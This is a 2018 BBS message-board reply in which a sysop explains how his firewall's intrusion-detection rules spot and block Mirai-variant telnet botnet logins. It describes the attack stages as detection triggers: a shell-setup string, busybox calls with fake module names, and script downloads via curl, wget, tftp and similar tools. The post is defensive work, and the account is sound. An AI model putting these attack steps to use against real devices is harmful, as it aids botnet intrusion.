On 2018 Jun 26 15:09:12, you wrote to Sean Dennis:

 NA> If a non-ANSI user calls here, I know that 99% of the time its a
 NA> script-kid. So I added a CAPTCHA; meaning, type the phrase you see. If
 NA> you answer wrong, your IP address is blacklisted in the NET2BBS
"kill"
 NA> file. A blacklisted system is trapped and disconnected before the BBS
 NA> loads. I write a seperate process that resets the kill file once a
 NA> week in the case of a false-positive.

that's similar to what i do here except i use an IDS on my firewall... ISP
issued modems are shit... just barely enough to call them a
modem/firewall/router... we use our's in bridge mode and have our own
dedicated firewall/router machine protecting the three networks here...
this firewall being one of smoothwall, ipfire, pfSense and similar... we
chose ours because we can customize it if we choose... the IDS comes with
but the automated dropping of unwanted connections is our custom
addition...

since i have frontdoor running and answering the connection requests on
telnet, it answers and logs the "DFRS" (data from ring signal)...
that should be the caller-id stuff but on telnet, with these automated
mirai variants, they just spew their credentials and then try to set up
their shell... it is because of frontdoor that i was able to see what was
going on... most bbses hide that data... so anyway, once i knew what was
going on, i wrote a few IDS rules to detect these connections... i followed
a few rules, though...

  1. we don't care what name and password they spew.
  2. we DO care if they try to set up their shell.
  3. shell setup is generally always the same
     enable.system.shell.sh
     (dots used for spaces so as to not trip IDS)
  4. after the above they generally try to load busybox
     with some fake module or program call. this call
     is simply a delimeter so they can see when their
     attempt is finished.
  5. sometimes, instead of loading busybox, they try
     to download scripts from somewhere else via tools
     like fgrep, curl, wget, ftpget, tftp, and even echo.

so with the above, we have five IDS rules... one to detect each stage of
the command shell setup attempt... that's really all it takes but we do
track the fake module or program names they try to initiate... that's how
the thing got its name and how the skiddies keep them separated...

in 2016, there were 12 unique variants.
in 2017, there were 30 new unique variants.
in 2018, there have been at least 73 new unique variants.

the most notable thing is that by running the IDS, we're able to detect
these attempts and stop them in the firewall before they even get a chance
to get into the network... sure, the initial part is being feed to the
mailer but as soon as the IDS qualifies the traffic as a mirai variant, it
drops the connection via iptables rules... right now we have rules for each
of the unique modules which we used as our trigger to block the connection
but it is just about to the point where we don't even care about them any
more... we could drop the connection just based on the attempt to set up
the shell which would reduce our rules set to only 4 rules instead of the
current 115 we have in place...

there used to be a lot more attempts as the skiddies attempted to build
their botnets... those attempts have dropped a lot since the beginning...
there's only maybe 5 unique variants that are active... at least going by
what is seen over here... sometimes an older one will come around and we
still see some mirai attempts... one of the funniest ones is using
"anarchy" as their fake module but the actual funny part is
they're trying to load "SH" for their shell instead of
"sh"... we all know how *nix systems are case sensitive so we
know this won't work but it could be a second round attempt where the first
round may have gotten in and created a "SH" shell... i dunno but
i'm glad to be having my firewall performing this analysis and blocking
rather than submitting my server to the abuse... that one IDS installation
on the firewall is protecting a number of bbses and they're very happy they
don't have to do the work of analyzing and blocking these skiddie
attempts...

at one point in time, our firewall was blocking over 4000 unique IPs that
were known to be infected with a mirai variant... the attempts have fallen
off a whole lot and today we're tracking less than 1000 unique IPs hitting
here... i want to suspect the skids are actually reading their logs and
seeing what BBS and mailer logons look like... i want to suspect they are
adjusting their code to detect those and drop the connection on their own
since they can't get in and do anything... i dunno... maybe it is all just
a dream...

)\/(ark

Always Mount a Scratch Monkey
Do you manage your own servers? If you are not running an IDS/IPS yer doin'
it wrong...
... be kind to your four footed friends...
---